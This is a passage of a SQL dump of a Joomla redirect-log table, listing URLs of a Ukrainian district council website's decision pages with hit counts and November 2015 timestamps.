00:00:00',301),(16052,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/382-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-vid_4','','','',19,0,'2015-11-01 04:23:35','0000-00-00 00:00:00',301),(16053,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/190-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2011_4','','','',27,0,'2015-11-01 04:23:38','0000-00-00 00:00:00',301);
INSERT INTO `fw3gt_redirect_links` VALUES (16054,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/190-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2011_4?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-01 04:23:40','0000-00-00 00:00:00',301),(16055,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/193-pro-upovnovazhennja-rajonnoi-derzhavnoi','','','',26,0,'2015-11-01 04:23:41','0000-00-00 00:00:00',301),(16056,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/193-pro-upovnovazhennja-rajonnoi-derzhavnoi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-01 04:23:43','0000-00-00 00:00:00',301),(16057,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/194-pro-nadannja-pilgi-z-orendnoi-plati-viddilu','','','',15,0,'2015-11-01 04:23:45','0000-00-00 00:00:00',301),(16058,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/106-pro-hid-vikonannja-rajonnoi-programi-realizacii_2','','','',10,0,'2015-11-01 04:23:47','0000-00-00 00:00:00',301),(16059,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/107-pro-hid-vikonannja-kompleksnoi-programi-zerno?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-01 04:23:48','0000-00-00 00:00:00',301),(16060,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/109-pro-programu-zabezpechennja-bezpeki-pri-vijavlenni?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-01 04:23:49','0000-00-00 00:00:00',301),(16061,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/110-pro-zatverdzhennja-novogo-skladu-komisii-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-01 04:23:51','0000-00-00 00:00:00',301),(16062,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/112-pro-hid-vikonannja-rajonnoi-programi_3','','','',15,0,'2015-11-01 04:23:53','0000-00-00 00:00:00',301),(16063,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/115-pro-ugodu-mizh-rajonnoju-ta-silskimi-selishhnimi','','','',17,0,'2015-11-01 04:23:54','0000-00-00 00:00:00',301),(16064,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/160-pro-stan-rozrahunkiv-za-majnovi-ta-zemelni-pai','','','',11,0,'2015-11-01 04:23:56','0000-00-00 00:00:00',301),(16065,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/167-pro-viplatu-odnorazovoi-groshovoi-dopomogi','','','',14,0,'2015-11-01 04:24:00','0000-00-00 00:00:00',301),(16066,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/168-pro-peredachu-koshtiv-na-zdijsnennja-vidatkiv?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-01 04:24:01','0000-00-00 00:00:00',301),(16067,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/188-pro-vnesennja-zmin-do-polozhennja-pro-konkursnij?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-01 04:24:03','0000-00-00 00:00:00',301),(16068,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/46-pro-vnesennja-zmin-do-programi-zaluchennja','','','',11,0,'2015-11-01 04:24:05','0000-00-00 00:00:00',301),(16069,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/54-pro-hid-vikonannja-rajonnoi-programi-socialnoi?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-01 04:24:06','0000-00-00 00:00:00',301),(16070,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/55-pro-hid-vikonannja-rajonnoi-programi-rozvitku_2','','','',13,0,'2015-11-01 04:24:08','0000-00-00 00:00:00',301),(16071,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/144-pro-hid-vikonannja-rajonnoi-cilovoi-programi_2?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-01 04:24:09','0000-00-00 00:00:00',301),(16072,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/145-pro-hid-vikonannja-rajonnoi-programi-zaluchennja','','','',11,0,'2015-11-01 04:24:11','0000-00-00 00:00:00',301),(16073,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/146-pro-peredachu-kotelni?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-01 04:24:12','0000-00-00 00:00:00',301),(16074,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/215-pro-efektivnist-finansovoi-pidtrimki-nadanoi-z?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-01 04:24:14','0000-00-00 00:00:00',301),(16075,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/229-pro-vnesennja-i-zatverdzhennja-zmin-do-statutu?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-01 04:24:16','0000-00-00 00:00:00',301),(16076,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/232-pro-formuvannja-statutnih-fondiv-pidpriemstv-shho?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-01 04:24:17','0000-00-00 00:00:00',301),(16077,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/36-pro-klopotannja-shhodo-pripinennja-prava','','','',25,0,'2015-11-01 04:24:19','0000-00-00 00:00:00',301),(16078,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/417-pro-peredachu-materialnih-cinnostej_2?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-01 04:24:22','0000-00-00 00:00:00',301),(16079,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/418-pro-zatverdzhennja-pereliku-pidpriemstv-shho-e','','','',14,0,'2015-11-01 04:24:24','0000-00-00 00:00:00',301),(16080,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/431-pro-zatverdzhennja-porjadku-i-normativiv_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-01 04:24:27','0000-00-00 00:00:00',301),(16081,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/440-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_18','','','',8,0,'2015-11-01 04:24:28','0000-00-00 00:00:00',301),(16082,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/444-pro-pogodzhennja-vvedennja-shtatnoi-odinici_2','','','',30,0,'2015-11-01 04:24:30','0000-00-00 00:00:00',301),(16083,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/335-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_4','','','',13,0,'2015-11-01 04:24:31','0000-00-00 00:00:00',301),(16084,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/336-pro-vnesennja-zmin-ta-dopovnen-do-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-01 04:24:33','0000-00-00 00:00:00',301),(16085,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/337-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-231','','','',9,0,'2015-11-01 04:24:34','0000-00-00 00:00:00',301),(16086,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/659-pro-pochatok-navchalnogo-procesu-u?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-01 04:24:38','0000-00-00 00:00:00',301),(16087,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/660-pro-situaciju-iz-obslugovuvannjam-miscevih','','','',88,0,'2015-11-01 04:24:39','0000-00-00 00:00:00',301),(16088,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/213-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_7','','','',38,0,'2015-11-01 04:24:41','0000-00-00 00:00:00',301),(16089,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/322-pro-zatverdzhennja-kompleksnoi-programi-protidii?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-01 04:24:42','0000-00-00 00:00:00',301),(16090,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/356-pro-zatverdzhennja-programi-rozvitku-malogo-i?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-01 04:24:44','0000-00-00 00:00:00',301),(16091,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/4-pro-zatverdzhennja-kompleksnoi-programi-rozvitku','','','',70,0,'2015-11-01 04:24:45','0000-00-00 00:00:00',301),(16092,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/412-pro-programu-socialno-ekonomichnogo-rozvitku_3','','','',21,0,'2015-11-01 04:24:47','0000-00-00 00:00:00',301),(16093,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/237-pro-vstup-malinskoi-rajonnoi-radi-do-vseukrainskoi?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-01 04:24:48','0000-00-00 00:00:00',301),(16094,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/872-pro-vnesennya-zmin-do-programi-zajnyatosti-naselennya-malinskogo-rajonu-na-period-do-2017roku?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-01 04:24:50','0000-00-00 00:00:00',301),(16095,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-25-02-2015-roku/1010-pro-zatverdzhennya-zvitu-pro-vikonannya-rajonnogo-byudzhetu-za-2014-rik?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-01 04:24:52','0000-00-00 00:00:00',301),(16096,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-25-09-2014-roku/879-pro-nadannya-prava-malinskij-rajonnij-radi-zdijsniti-pererakhuvannya-koshtiv?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-01 04:24:53','0000-00-00 00:00:00',301),(16097,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/76-rishennya-vid-29-07-2015-roku/1165-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-01 04:24:55','0000-00-00 00:00:00',301),(16098,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&id=42:--16052012-&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','','',2,0,'2015-11-01 04:48:09','0000-00-00 00:00:00',301),(16099,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&id=45:--14112012-&lang=uk&layout=blog&limitstart=20&option=com_content&view=category','','','',2,0,'2015-11-01 04:48:09','0000-00-00 00:00:00',301),(16100,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=452:-20-2011-100-l-r-&lang=uk&option=com_content&view=article','','','',5,0,'2015-11-01 04:48:10','0000-00-00 00:00:00',301),(16101,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37&id=440:2011-10-21-16-24-47&lang=ru&option=com_content&view=article','','','',1,0,'2015-11-01 05:20:51','0000-00-00 00:00:00',301),(16102,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1161:2013-12-18-13-34-32&lang=ru&option=com_content&view=article','','','',3,0,'2015-11-01 05:20:51','0000-00-00 00:00:00',301),(16103,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-?limitstart=0','','','',14,0,'2015-11-01 06:03:31','0000-00-00 00:00:00',301),(16104,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=42&Itemid=80&lang=ru','','','',14,0,'2015-11-01 06:18:30','0000-00-00 00:00:00',301),(16105,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/665-pro-nadannja-dozvolu-komunalnij-ustanovi-malinskij','','','',6,0,'2015-11-01 06:37:24','0000-00-00 00:00:00',301),(16106,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/674-pro-zatverdzhennja-rajonnoi-programi-poshuku-i','','','',3,0,'2015-11-01 06:37:26','0000-00-00 00:00:00',301),(16107,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/680-pro-zatverdzhennja-planu-dijalnosti-rajonnoi-radi_2','','','',3,0,'2015-11-01 06:37:28','0000-00-00 00:00:00',301),(16108,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/681-pro-programu-zabezpechennja-deputatskoi-dijalnosti_3','','','',4,0,'2015-11-01 06:37:29','0000-00-00 00:00:00',301),(16109,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/681-pro-programu-zabezpechennja-deputatskoi-dijalnosti_3?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-01 06:37:31','0000-00-00 00:00:00',301),(16110,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/682-pro-zatverdzhennja-rajonnoi-programi_3','','','',4,0,'2015-11-01 06:37:33','0000-00-00 00:00:00',301),(16111,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/682-pro-zatverdzhennja-rajonnoi-programi_3?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-01 06:37:34','0000-00-00 00:00:00',301),(16112,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/692-pro-zatverdzhennja-strukturi-ta-chiselnosti_2','','','',5,0,'2015-11-01 06:37:36','0000-00-00 00:00:00',301),(16113,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/692-pro-zatverdzhennja-strukturi-ta-chiselnosti_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-01 06:37:37','0000-00-00 00:00:00',301),(16114,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/693-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_15','','','',9,0,'2015-11-01 06:37:39','0000-00-00 00:00:00',301),(16115,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/695-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_17','','','',4,0,'2015-11-01 06:37:40','0000-00-00 00:00:00',301),(16116,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/696-pro-zatverdzhennja-ugodi-pro-spilne-finansuvannja?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-01 06:37:42','0000-00-00 00:00:00',301),(16117,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/822-pro-stan-utrimannja-avtomobilnih-dorig-i-bezpeku?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-01 06:37:50','0000-00-00 00:00:00',301),(16118,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/220-pro-zvit-golovi-rajonnoi-derzhavnoi-administracii_2','','','',3,0,'2015-11-01 06:38:05','0000-00-00 00:00:00',301),(16119,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/6-pro-zatverdzhennja-porjadku-i-normativiv','','','',5,0,'2015-11-01 06:38:07','0000-00-00 00:00:00',301),(16120,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/6-pro-zatverdzhennja-porjadku-i-normativiv?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-01 06:38:08','0000-00-00 00:00:00',301),(16121,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/7-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-01 06:38:10','0000-00-00 00:00:00',301),(16122,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1157:-11-2013-&lang=uk&option=com_content&view=article','','','',1,0,'2015-11-01 07:01:22','0000-00-00 00:00:00',301),(16123,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/230-pro-vnesennja-zmin-do-rajonnoi-programi-shhodo?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-01 07:08:21','0000-00-00 00:00:00',301),(16124,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/660-pro-situaciju-iz-obslugovuvannjam-miscevih?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-01 07:08:22','0000-00-00 00:00:00',301),(16125,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/913-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-01 07:08:25','0000-00-00 00:00:00',301),(16126,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/927-pro-spisannya-osnovnikh-zasobiv','','','',4,0,'2015-11-01 07:08:26','0000-00-00 00:00:00',301),(16127,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/927-pro-spisannya-osnovnikh-zasobiv?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-01 07:08:27','0000-00-00 00:00:00',301),(16128,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/76-rishennya-vid-29-07-2015-roku/1164-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji','','','',5,0,'2015-11-01 07:08:29','0000-00-00 00:00:00',301),(16129,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/76-rishennya-vid-29-07-2015-roku/1164-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-01 07:08:30','0000-00-00 00:00:00',301),(16130,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=39:-22022012-&layout=blog&Itemid=76&lang=en&limitstart=10','','','',5,0,'2015-11-01 08:17:05','0000-00-00 00:00:00',301),(16131,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=39&Itemid=76&lang=en&limitstart=10','','','',9,0,'2015-11-01 08:19:18','0000-00-00 00:00:00',301),(16132,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-?lang=uk&start=21','','http://go.mail.ru/search_images','',6,0,'2015-11-01 08:45:34','0000-00-00 00:00:00',301),(16133,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1100-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik','','','',27,0,'2015-11-01 09:01:16','0000-00-00 00:00:00',301),(16134,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/610-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_13','','','',12,0,'2015-11-01 09:08:01','0000-00-00 00:00:00',301),(16135,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1079-oprilyudnennya-vidomostej-pro-dokhodi-za-2014-rik-kerivnitstva-dibrivskoji-silskoji-radi','','','',28,0,'2015-11-01 09:14:27','0000-00-00 00:00:00',301),(16136,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1081-oprilyudnennya-vidomostej-pro-dokhodi-za-2014-rik-kerivnitstva-granitnenskoji-selishchnoji-radi?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-01 09:14:30','0000-00-00 00:00:00',301),(16137,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1131-granitnenska-selishchna-rada-informue?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-01 09:14:33','0000-00-00 00:00:00',301),(16138,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1138-vishivska-silska-rada-informue?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-01 09:14:38','0000-00-00 00:00:00',301),(16139,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1140-starovorob-jivska-silska-rada-informue?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-01 09:14:50','0000-00-00 00:00:00',301),(16140,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1141-budo-vorob-jivska-silska-rada-informue?tmpl=component&print=1&layout=default&page=','','','',10,0,'2015-11-01 09:14:53','0000-00-00 00:00:00',301),(16141,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1142-chopovitska-selishchna-rada-informue?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-01 09:14:56','0000-00-00 00:00:00',301),(16142,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1143-chopovitska-selishchna-rada-informue-pro-zatverdzhennya-polozhennya?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-01 09:15:01','0000-00-00 00:00:00',301),(16143,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1144-ukrajinkivska-silska-rada-informue?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-01 09:15:04','0000-00-00 00:00:00',301),(16144,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1145-ustinivska-silska-rada-informue?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-01 09:15:07','0000-00-00 00:00:00',301),(16145,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1146-ivanivska-silska-rada-informue','','','',36,0,'2015-11-01 09:15:10','0000-00-00 00:00:00',301),(16146,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1154-vladivska-silska-rada-informue','','','',39,0,'2015-11-01 09:15:24','0000-00-00 00:00:00',301),(16147,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1157-gorinska-silska-rada-informue','','','',28,0,'2015-11-01 09:15:30','0000-00-00 00:00:00',301),(16148,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/699-pro-zvernennja-deputativ-malinskoi-rajonnoi-radi_2','','','',59,0,'2015-11-01 09:42:01','0000-00-00 00:00:00',301),(16149,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--11032013-/453-pro-nadannja-zgodi-na-provedennja-kapitalnogo','','','',19,0,'2015-11-01 09:42:37','0000-00-00 00:00:00',301),(16150,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--11032013-/476-pro-nadannja-dozvolu-na-vlashtuvannja-marchenko-v','','','',69,0,'2015-11-01 09:42:48','0000-00-00 00:00:00',301),(16151,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--11072014-/846-pro-zgodu-na-peredachu-mizhbjudzhetnogo-transfertu_2','','','',21,0,'2015-11-01 09:42:57','0000-00-00 00:00:00',301),(16152,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--11072014-/847-pro-vnesennja-zmin-do-rajonnoi-programi_5','','','',44,0,'2015-11-01 09:43:09','0000-00-00 00:00:00',301),(16153,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--11072014-/850-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2014_4','','','',25,0,'2015-11-01 09:43:20','0000-00-00 00:00:00',301),(16154,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/266-pro-vnesennja-zmin-do-rajonnoi-programi','','','',18,0,'2015-11-01 09:43:31','0000-00-00 00:00:00',301),(16155,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/505-pro-spisannja-avtomobilja','','','',64,0,'2015-11-01 09:43:42','0000-00-00 00:00:00',301),(16156,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/514-pro-zatverdzhennja-rezultativ-aukcionnih-torgiv-z','','','',31,0,'2015-11-01 09:43:52','0000-00-00 00:00:00',301),(16157,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/515-pro-zatverdzhenja-aktu-prijomu-peredachi','','','',28,0,'2015-11-01 09:44:02','0000-00-00 00:00:00',301),(16158,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/519-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2013','','','',25,0,'2015-11-01 09:44:16','0000-00-00 00:00:00',301),(16159,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12092012-/58-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2012','','','',25,0,'2015-11-01 09:44:28','0000-00-00 00:00:00',301),(16160,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/396-pro-pogodzhennja-priznachennja-na-posadu-direktora_2','','','',34,0,'2015-11-01 09:44:40','0000-00-00 00:00:00',301),(16161,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/397-pro-skasuvannja-rishennja-rajonnoi-radi-vid-12','','','',44,0,'2015-11-01 09:44:47','0000-00-00 00:00:00',301),(16162,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/399-pro-zatverdzhennja-zmin-do-strukturi-ta','','','',73,0,'2015-11-01 09:44:59','0000-00-00 00:00:00',301),(16163,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/400-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2012_5','','','',16,0,'2015-11-01 09:45:05','0000-00-00 00:00:00',301),(16164,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/767-pro-zatverdzhennja-tehnichnoi-dokumentacii-po_6','','','',20,0,'2015-11-01 09:45:11','0000-00-00 00:00:00',301),(16165,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/769-pro-zatverdzhennja-rozporjadzhennja-golovi_3','','','',23,0,'2015-11-01 09:45:23','0000-00-00 00:00:00',301),(16166,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/770-pro-zatverdzhennja-programi-ohoroni-ta','','','',14,0,'2015-11-01 09:45:29','0000-00-00 00:00:00',301),(16167,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/773-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2014','','','',32,0,'2015-11-01 09:45:36','0000-00-00 00:00:00',301),(16168,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/774-pro-nadannja-prava-malinskij-rajonnij-radi_2','','','',20,0,'2015-11-01 09:45:43','0000-00-00 00:00:00',301),(16169,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/191-pro-vnesennja-zmin-do-tipovogo-dogovoru-orendi','','','',28,0,'2015-11-01 09:45:51','0000-00-00 00:00:00',301),(16170,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/192-pro-vnesennja-zmin-ta-dopovnen-do-polozhennja-pro','','','',12,0,'2015-11-01 09:45:57','0000-00-00 00:00:00',301),(16171,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/196-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-vid','','','',20,0,'2015-11-01 09:46:34','0000-00-00 00:00:00',301),(16172,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/197-pro-nadannja-zgodi-komunalnomu-pidpriemstvu','','','',34,0,'2015-11-01 09:46:43','0000-00-00 00:00:00',301),(16173,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/102-pro-polozhennja-pro-postijni-komisii-rajonnoi-radi','','','',39,0,'2015-11-01 09:47:03','0000-00-00 00:00:00',301),(16174,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/103-pro-reglament-roboti-rajonnoi-radi','','','',21,0,'2015-11-01 09:47:13','0000-00-00 00:00:00',301),(16175,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/104-pro-utvorennja-frakcij','','','',42,0,'2015-11-01 09:47:23','0000-00-00 